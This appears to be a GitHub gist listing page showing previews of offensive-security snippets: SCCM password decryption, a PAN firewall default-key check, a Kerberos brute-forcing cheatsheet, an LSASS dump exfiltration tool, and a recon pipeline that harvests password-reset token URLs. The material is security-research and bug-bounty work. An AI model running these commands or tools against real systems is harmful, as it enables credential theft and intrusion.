Skip to content

Instantly share code, notes, and snippets.

View jayaram-yalla's full-sized avatar

jayaram-yalla

4 followers · 1 following
View GitHub Profile
@ustayready
ustayready / gpt.py
Created January 16, 2023 23:49
CloudGPT - Use ChatGPT to analyze AWS policies for vulnerabilities
import openai
import boto3
import json
import time
from typing import Dict, List
openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')
@wanted1205
wanted1205 / INTIGRITI-secure-Challenge_1.md
Last active October 20, 2022 21:12
INTIGRITI-Challenge

The goal of this challenge is to become the steal everyone's money, but there are some checks which needs to be bypassed.

Code

An attacker can give account number of victim on from post parameter and on to parameter attacker can use his account number.As there is no check for verifying that from account is user’s account only.

But we need to verify it too.

@rqu1
rqu1 / checkmk.py
Last active August 4, 2024 16:42
check if a PAN firewall is using the default master key when globalprotect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
@xpn
xpn / sccmdecryptpoc.cs
Last active February 18, 2025 21:48
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program
@R0X4R
R0X4R / tweets.txt
Created February 12, 2022 15:30
tweets collection
subfinder -d target.com -all -silent -t 10 | naabu -p "21,22,80,81,280,300,443,583,591,593,832,981,1010,1099,1311,2082,2087,2095,2096,2480,3000,3128,3333,4243,4444,4445,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7002,7396,7474,8000,8001,8008,8009,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8530,8531,8834,8880,8887,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,10443,11371,12043,12046,12443,15672,16080,17778,18091,18092,20720,28017,32000,55440,55672" -silent -nc | httprobe -prefer-https | xargs -P 10 -I @ bash -c "echo @ | gau" 2> /dev/null | grep -E "password|password\-reset|reset\-token|token\=" | anew -q urls.txt
xargs -a urls.txt -P 5 -I @ bash -c "curl -ks -L \"@\" -H \"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36\" | grep -iE \"enter password|new password|new\-password|confirm password|co
@jayaram-yalla
jayaram-yalla / kerberos_attacks_cheatsheet.md
Created February 8, 2022 20:29 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@snovvcrash
snovvcrash / GetZip.py
Last active February 8, 2023 13:56
Exfiltrate LSASS dump over TCP
#!/usr/bin/env python3
# Usage: GetZip.py 0.0.0.0 1337 [--xor 255] --md5 --parse
# Requirements: pip3 install tqdm pypykatz
import os
import socket
import zipfile
import hashlib
from argparse import ArgumentParser
@prinsharma1999
prinsharma1999 / bbprograms.txt
Created December 5, 2020 16:31
Saved from https://gist.github.com/onurcyukruk/5e70bd1f16d0428a34aed08d4cff0773
google dork -> site:.co.uk inurl:"responsible disclosure"
https://registry.internetnz.nz/about/vulnerability-disclosure-policy/
http://www.123contactform.com/security-acknowledgements.htm
https://18f.gsa.gov/vulnerability-disclosure-policy/
https://support.1password.com/security-assessments/
https://www.23andme.com/security-report/
https://www.abnamro.com/en/footer/responsible-disclosure.html
https://www.accenture.com/us-en/company-accenture-responsible-disclosure
https://www.accredible.com/white_hat/
https://www.acquia.com/how-report-security-issue
@prinsharma1999
prinsharma1999 / bug bounty dorks.txt
Created July 20, 2020 19:57
responsible disclosure reward r=h:UK
site:*.*.nl intext:security report reward
inurl:responsible disclosure reward
inurl:responsible disclosure bounty
inurl:responsible disclosure swag
site:*.*.nl intext:responsible disclosure reward
responsible disclosure reward r=h:eu
@Voorivex
Voorivex / HezarSploit.py
Created July 2, 2020 14:45
#!/usr/bin/python
# -*- coding: utf-8 -*-
import ssl
import socket
import os
import sys
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from threading import Thread